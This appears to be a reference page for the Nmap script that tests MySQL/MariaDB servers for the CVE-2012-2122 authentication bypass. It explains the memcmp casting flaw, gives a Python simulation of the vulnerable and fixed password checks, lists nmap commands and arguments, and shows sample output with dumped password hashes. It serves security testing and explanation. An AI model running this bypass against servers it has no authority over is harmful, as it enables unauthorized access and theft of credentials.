Nmap mysql-vuln-cve2012-2122 NSE Script
This page contains detailed information about how to use the mysql-vuln-cve2012-2122 NSE script. For a list of all NSE scripts, visit the Nmap NSE Library.
Script Overview
Script source code: https://github.com/nmap/nmap/tree/master/scripts/mysql-vuln-cve2012-2122.nse
Script categories: discovery, intrusive, vuln
Target service / protocol: mysql
Target network port(s): 3306
List of CVEs: CVE-2012-2122
Script Description
The mysql-vuln-cve2012-2122.nse script attempts to bypass authentication on MySQL and MariaDB servers by exploiting CVE-2012-2122. If the server is vulnerable, the script also attempts to dump the MySQL usernames and password hashes.
All MariaDB and MySQL versions up to 5.1.61, 5.2.11, 5.3.5 and 5.5.22 are affected, but whether the bug is exploitable depends on the memcmp() implementation the server was built against: the bypass only works when memcmp() can return an integer outside the -128..127 range.
"When a user connects to MariaDB/MySQL, a token (SHA over a password and a random scramble string) is calculated and compared with the expected value. Because of incorrect casting, it might've happened that the token and the expected value were considered equal, even if the memcmp() returned a non-zero value. In this case MySQL/MariaDB would think that the password is correct, even while it is not. Because the protocol uses random strings, the probability of hitting this bug is about 1/256. Which means, if one knows a user name to connect (and "root" almost always exists), she can connect using *any* password by repeating connection attempts. ~300 attempts takes only a fraction of second, so basically account password protection is as good as nonexistent."
Original public advisory: http://seclists.org/oss-sec/2012/q2/493
Interesting post about this vuln: https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql
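The bypass described above, as an added example (not code from the Nmap script or from the MySQL source): a Python model of the mysql_native_password exchange, with the client computing its reply token and the server recomputing SHA1(SHA1(password)) and comparing it with the stored hash. The vulnerable check truncates the memcmp() result to my_bool (a char) the way the pre-fix check_scramble() did; the fixed check treats any non-zero result as a mismatch, as the patch does. The word-wide memcmp() model, the passwords and the RNG seed are constructed for the illustration and stand in for whatever the target's libc actually does.

```python
"""Added model of CVE-2012-2122 (not code from the Nmap script or MySQL).

Pre-fix server logic, simplified:
    my_bool check_scramble(...) { ...; return memcmp(hash_stage2, reassured, 20); }
memcmp() returns an int; storing it in my_bool (a char) keeps only the low
byte, so any non-zero result that is a multiple of 256 is mistaken for 0.
"""
import hashlib
import random
import struct

SCRAMBLE_LEN = 20  # 4.1+ protocol scramble length


def sha1(data: bytes) -> bytes:
    return hashlib.sha1(data).digest()


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def stored_hash_stage2(password: bytes) -> bytes:
    """Value kept in mysql.user: SHA1(SHA1(password)), the '*...' hashes in the script output."""
    return sha1(sha1(password))


def client_reply(password: bytes, scramble: bytes) -> bytes:
    """Client token: SHA1(password) XOR SHA1(scramble || SHA1(SHA1(password)))."""
    stage1 = sha1(password)
    return xor_bytes(stage1, sha1(scramble + sha1(stage1)))


def wide_memcmp(a: bytes, b: bytes) -> int:
    """Constructed model of an optimised memcmp(): compares 32-bit words and
    returns the full difference of the first differing word, so results
    routinely fall outside -128..127. Not a copy of any particular libc."""
    for i in range(0, len(a), 4):
        wa, = struct.unpack_from("<I", a, i)
        wb, = struct.unpack_from("<I", b, i)
        if wa != wb:
            return wa - wb
    return 0


def to_my_bool(value: int) -> int:
    """Implicit int -> my_bool (char, signed on x86): keep the low 8 bits, reinterpret as signed."""
    v = value & 0xFF
    return v - 256 if v >= 128 else v


def _reassured_hash(scramble: bytes, reply: bytes, hash_stage2: bytes) -> bytes:
    """Server side: recover SHA1(password) from the reply, then hash it again."""
    stage1 = xor_bytes(reply, sha1(scramble + hash_stage2))
    return sha1(stage1)


def check_scramble_vulnerable(scramble, reply, hash_stage2, memcmp=wide_memcmp) -> bool:
    """Pre-fix check: access granted when the truncated memcmp() result is 0."""
    result = memcmp(hash_stage2, _reassured_hash(scramble, reply, hash_stage2))
    return to_my_bool(result) == 0


def check_scramble_fixed(scramble, reply, hash_stage2, memcmp=wide_memcmp) -> bool:
    """Patched check (return test(memcmp(...))): any non-zero result is a mismatch."""
    result = memcmp(hash_stage2, _reassured_hash(scramble, reply, hash_stage2))
    return result == 0


def attempts_until_bypass(real_password, wrong_password, checker, max_attempts, seed=2012):
    """What the script's iterations loop does: reconnect with the same wrong
    password until the server accepts it. Returns the 1-based attempt number,
    or 0 if max_attempts is exhausted. The scramble is fresh per connection,
    which is what makes each attempt an independent ~1/256 chance."""
    rng = random.Random(seed)  # seeded only so the demo is reproducible
    hash_stage2 = stored_hash_stage2(real_password)
    for attempt in range(1, max_attempts + 1):
        scramble = bytes(rng.getrandbits(8) for _ in range(SCRAMBLE_LEN))
        if checker(scramble, client_reply(wrong_password, scramble), hash_stage2):
            return attempt
    return 0


if __name__ == "__main__":
    # Same defaults as the script: 1500 iterations, password "nmapFTW" (real password is constructed).
    for name, checker in (("vulnerable", check_scramble_vulnerable), ("fixed", check_scramble_fixed)):
        n = attempts_until_bypass(b"s3cret", b"nmapFTW", checker, 1500)
        print(f"{name} server: " + (f"granted access at iteration #{n}" if n else "denied all 1500 attempts"))
```

Run stand-alone, the modelled vulnerable server accepts nmapFTW after a few hundred connections (the same order of magnitude as the "iteration #204" in the sample output below) while the fixed variant denies every attempt. The 1/256 figure falls straight out of the cast: only the low byte of memcmp()'s result survives, and for a random difference that byte is zero one time in 256. Passing a different memcmp to the checkers shows the other half of the caveat in the description: a libc whose memcmp() only ever returns -1, 0 or 1 is never truncated to a false 0, so the same server binary is not exploitable there.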
Mysql-vuln-cve2012-2122 NSE Script Arguments
This is a full list of arguments supported by the mysql-vuln-cve2012-2122.nse script:
mysql-vuln-cve2012-2122.iterations: Connection retries. Default: 1500.
mysql-vuln-cve2012-2122.pass: MySQL password. Default: nmapFTW.
mysql-vuln-cve2012-2122.socket_timeout: Socket timeout. Default: 5s.
mysql-vuln-cve2012-2122.user: MySQL username. Default: root.
vulns.short: If set, vulnerabilities will be output in short format, a single line consisting of the host's target name or IP, the state, and either the CVE ID or the title of the vulnerability. Does not affect XML output.
vulns.showall: If set, the library will show and report all the registered vulnerabilities, which includes the NOT VULNERABLE ones. By default the library will only report the VULNERABLE entries: VULNERABLE, LIKELY VULNERABLE, VULNERABLE (DoS) and VULNERABLE (Exploitable). This argument affects the following functions: vulns.Report.make_output(), the default output function for portrule/hostrule scripts; vulns.make_output(), the default output function for postrule scripts; and the vulns.format_vuln() and vulns.format_vuln_table() functions.
- - -
To use these script arguments, add them to the Nmap command line using the --script-args arg1=value,[arg2=value,..] syntax. For example:
nmap --script=mysql-vuln-cve2012-2122 --script-args mysql-vuln-cve2012-2122.iterations=value,mysql-vuln-cve2012-2122.pass=value <target>
Mysql-vuln-cve2012-2122 NSE Script Example Usage
Here's an example of how to use the mysql-vuln-cve2012-2122.nse script:
nmap -p3306 --script mysql-vuln-cve2012-2122 <target>
nmap -sV --script mysql-vuln-cve2012-2122 <target>
Mysql-vuln-cve2012-2122 NSE Script Example Output
Here's a sample output from the mysql-vuln-cve2012-2122.nse script:
PORT STATE SERVICE REASON
3306/tcp open mysql syn-ack
| mysql-vuln-cve2012-2122:
| VULNERABLE:
| Authentication bypass in MySQL servers.
| State: VULNERABLE
| IDs: CVE:CVE-2012-2122
| Description:
| When a user connects to MariaDB/MySQL, a token (SHA
| over a password and a random scramble string) is calculated and compared
| with the expected value. Because of incorrect casting, it might've
| happened that the token and the expected value were considered equal,
| even if the memcmp() returned a non-zero value. In this case
| MySQL/MariaDB would think that the password is correct, even while it is
| not. Because the protocol uses random strings, the probability of
| hitting this bug is about 1/256.
| Which means, if one knows a user name to connect (and "root" almost
| always exists), she can connect using *any* password by repeating
| connection attempts. ~300 attempts takes only a fraction of second, so
| basically account password protection is as good as nonexistent.
|
| Disclosure date: 2012-06-9
| Extra information:
| Server granted access at iteration #204
| root:*9CFBBC772F3F6C106020035386DA5BBBF1249A11
| debian-sys-maint:*BDA9386EE35F7F326239844C185B01E3912749BF
| phpmyadmin:*9CFBBC772F3F6C106020035386DA5BBBF1249A11
| References:
| https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql
| http://seclists.org/oss-sec/2012/q2/493
|_ http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2122
Mysql-vuln-cve2012-2122 NSE Script Example XML Output
There is no sample XML output for this module. However, by providing the -oX <file> option, Nmap will produce XML output and save it to the given file.
Author
- Paulino Calderon
References
- https://nmap.org/nsedoc/scripts/mysql-vuln-cve2012-2122.html
- https://github.com/nmap/nmap/tree/master/scripts/mysql-vuln-cve2012-2122.nse
- http://seclists.org/oss-sec/2012/q2/493
- https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql
- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2122
See Also
Related NSE scripts to the mysql-vuln-cve2012-2122.nse script:
- mysql-audit.nse
- mysql-brute.nse
- mysql-databases.nse
- mysql-dump-hashes.nse
- mysql-empty-password.nse
- mysql-enum.nse
- mysql-info.nse
- mysql-query.nse
- mysql-users.nse
- mysql-variables.nse
Visit Nmap NSE Library for more scripts.
Version
This page has been created based on Nmap version 7.92.